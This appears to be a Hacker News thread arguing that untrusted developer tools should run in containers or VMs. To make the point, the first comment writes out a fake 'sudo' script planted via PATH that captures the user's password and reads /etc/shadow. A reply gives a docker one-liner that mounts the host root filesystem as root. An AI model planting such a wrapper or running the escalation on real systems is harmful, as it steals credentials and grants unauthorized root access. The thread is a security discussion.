Linux distributions do not need Copy Fail to get root access: echo 'export PAT...

sergeykish • today at 10:26 AM • 1 reply • view on HN

Linux distributions do not need Copy Fail to get root access:

    echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bashrc

    mkdir -p .local/bin/
    cat <<EOF >.local/bin/sudo
    read -rs -p "[sudo] password for $USER: " PASSWORD
    echo ""
    echo "$PASSWORD" | /usr/bin/sudo -S head /etc/shadow
    EOF

    chmod +x .local/bin/sudo

attack on next sudo call, shows data accessible only to root.

Our security model based on distributions verifying packages, that is distro maintainers. Software we can't trust should be running in VMs. Attack on trivy is just the beginning and solution is removing pip, uv, npm, rbenv from host, running in docker containers:

    $ docker run -it -v.:/app -w /app node:alpine /bin/sh

long term environments defined in docker compose:

    $ docker-compose.yml
    services:
      app:
        image: node:alpine
        volumes:
          - .:/app
        working_dir: /app
        command: /bin/sh
    $ docker compose run app

switch to Kata etc if more protection needed. Eventually all userspace would run in VMs.

Replies

quectophoton • today at 11:21 AM

If `docker` is already there, why even bother with `sudo` when you can just:

    docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'

Chances are that the person who set up Docker didn't do it properly.

➕ show 1 reply

alt Hacker News

Replies